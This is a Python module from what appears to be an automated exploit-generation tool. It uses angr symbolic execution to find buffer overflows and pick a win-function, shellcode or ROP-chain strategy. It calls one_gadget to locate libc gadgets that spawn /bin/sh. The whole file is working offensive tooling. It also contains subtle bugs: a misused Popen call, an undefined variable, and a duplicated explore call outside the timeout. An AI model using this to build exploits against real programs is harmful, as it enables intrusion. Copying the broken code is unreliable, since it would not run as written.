import angr
import claripy
import time
import timeout_decorator
import IPython
import r2pipe
import json
import os
import subprocess
from struct import pack
from angr import sim_options as so
from zeratool import puts_model, printf_model, malloc_model
from .simgr_helper import hook_four
import logging

log = logging.getLogger(__name__)

# from pwn import *

from .simgr_helper import (
    point_to_win_filter,
    point_to_shellcode_filter,
    point_to_ropchain_filter,
)
from .radare_helper import getRegValues, findShellcode, get_base_addr


"""
one gadget is writtin in ruby, so we need to call it externally
These are all offsets into libc
"""


def getOneGadget(properties):

    from subprocess import Popen, PIPE, STDOUT

    if "libc" not in properties or properties["libc"] is None:
        log.info("[-] One gadget RCE relies on libc. Please add libc")
        exit(0)
    if "libc_base" not in properties or properties["libc_base"] is None:
        log.info("[~] No libc base address specified. Chains will use 0x0 as base")

    # If installed using helper script, one gadget should be on $PATH
    one_gadget = Popen("one_gadget", properties["libc"], stdout=PIPE)
    lines = one_gadgets.stdout.communicate()[0].split("\n")

    gadget_addrs = []

    # Only grab the addresses
    for line in lines:
        if "/bin/sh" in line:
            log.info("[+] {}".format(line))
            gadget_addrs.append(line.split(" ")[0])

    return gadget_addrs


def exploitOverflow(binary_name, properties, inputType="STDIN"):

    run_environ = properties["pwn_type"].get("results", {})
    run_environ["type"] = run_environ.get("type", None)

    p = angr.Project(binary_name, load_options={"auto_load_libs": False})
    if properties.get("libc", None) and not isinstance(properties["libc"], dict):
        libc_base_addr = properties.get("libc_base_address", 0x500000)
        libc_base_name = os.path.basename(properties["libc"])
        p = angr.Project(
            binary_name,
            load_options={"auto_load_libs": False},
            force_load_libs=[properties["libc"]],
            lib_opts={libc_base_name: {"base_addr": libc_base_addr}},
        )
    if p.loader.main_object.pic:
        log.info("Binary is PIC getting base addr")
        base_addr = get_base_addr(binary_name)
        p = angr.Project(
            binary_name,
            load_options={
                "auto_load_libs": False,
                "main_opts": {"base_addr": base_addr},
            },
        )
    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY, so.TRACK_CONSTRAINTS}

    p.hook_symbol("rand", hook_four())
    p.hook_symbol("srand", hook_four())
    p.hook_symbol("puts", puts_model.putsFormat())

    p.hook_symbol("printf", printf_model.printf_leak_detect(0))
    p.hook_symbol("fprintf", printf_model.printf_leak_detect(1))
    p.hook_symbol("dprintf", printf_model.printf_leak_detect(1))
    p.hook_symbol("sprintf", printf_model.printf_leak_detect(1))
    p.hook_symbol("snprintf", printf_model.printf_leak_detect(2))
    p.hook_symbol("vprintf", printf_model.printf_leak_detect(1))
    p.hook_symbol("vfprintf", printf_model.printf_leak_detect(1))
    p.hook_symbol("vdprintf", printf_model.printf_leak_detect(1))
    p.hook_symbol("vsprintf", printf_model.printf_leak_detect(1))
    p.hook_symbol("vsnprintf", printf_model.printf_leak_detect(2))

    p.hook_symbol("malloc", malloc_model.malloc_addr_tracker())

    has_pie = properties.get("protections", {}).get("pie", False)

    # Setup state based on input type
    argv = [binary_name]
    input_arg = claripy.BVS("input", 400 * 8)
    if inputType == "STDIN":
        entry_addr = p.loader.main_object.entry
        if not has_pie:
            reg_values = getRegValues(binary_name, entry_addr)
        state = p.factory.full_init_state(
            args=argv,
            add_options=extras,
            stdin=input_arg,
            env=os.environ,
        )

        if not has_pie:
            # Just set the registers
            register_names = list(state.arch.register_names.values())
            for register in register_names:
                if register in reg_values:  # Didn't use the register
                    state.registers.store(register, reg_values[register])

    elif inputType == "LIBPWNABLE":

        handle_connection = p.loader.main_object.get_symbol("handle_connection")
        start_addr = handle_connection.rebased_addr

        reg_values = getRegValues(binary_name, start_addr)

        state = p.factory.entry_state(
            args=argv,
            env=os.environ,
            addr=start_addr,
            add_options=extras,
            stdin=input_arg,
        )
        # state = p.factory.full_init_state(args=argv,env=os.environ,addr=start_addr,add_options=extras)

        if not has_pie:
            # Just set the registers
            register_names = list(state.arch.register_names.values())
            for register in register_names:
                if register in reg_values:  # Didn't use the register
                    state.registers.store(register, reg_values[register])

    else:
        argv.append(input_arg)
        state = p.factory.full_init_state(args=argv, add_options=extras)

    state.globals["needs_leak"] = True
    if run_environ["type"] == "leak":
        state.globals["needs_leak"] = False
        state.globals["leak_input"] = run_environ["leak_input"]
        for x, y in enumerate(run_environ["leak_input"]):
            state.add_constraints(input_arg.get_byte(x) == y)

    state.libc.buf_symbolic_bytes = 0x100
    state.globals["user_input"] = input_arg
    state.globals["inputType"] = inputType
    state.globals["properties"] = properties
    simgr = p.factory.simgr(state, save_unconstrained=True)

    step_func = pickFilter(simgr, properties)
    if step_func is None:
        log.info("[-] Error could not device exploit strategy")
        exit(1)

    end_state = None
    # Lame way to do a timeout
    simgr.explore(find=lambda s: "type" in s.globals, step_func=step_func)
    try:

        @timeout_decorator.timeout(1200)
        def exploreBinary(simgr):
            simgr.explore(find=lambda s: "type" in s.globals, step_func=step_func)

        exploreBinary(simgr)

    except (KeyboardInterrupt, timeout_decorator.TimeoutError) as e:
        log.info("[~] Overflow check timed out")
        return run_environ

    end_state = simgr.found[0]
    run_environ["type"] = end_state.globals["type"]
    if run_environ["type"] == "leak":
        run_environ["leak_input"] = end_state.globals["leak_input"] + b"\n"
        run_environ["leak_output"] = end_state.globals["output_before_leak"]
        run_environ["leaked_function"] = end_state.globals["leaked_func"]

    if run_environ["type"] == "dlresolve":
        run_environ["dlresolve_first"] = end_state.globals["dlresolve_first"]
        run_environ["dlresolve_second"] = end_state.globals["dlresolve_second"]

    run_environ["input"] = end_state.globals.get("input", None)

    log.info("[+] Triggerable with input : {}".format(run_environ["input"]))
    return run_environ


def pickFilter(simgr, properties):

    has_nx = properties.get("protections", {}).get("nx", True)
    force_shellcode = properties.get("force_shellcode", False)
    if properties.get("win_functions", None):
        log.info("[+] Using point to win function technique")
        return point_to_win_filter
    elif not has_nx and force_shellcode:
        log.info("[+] Binary does not have NX")
        log.info("[+] Placing shellcode and pointing")
        return point_to_shellcode_filter
    else:
        log.info("[+] Building rop and pointing")
        return point_to_ropchain_filter
    return None
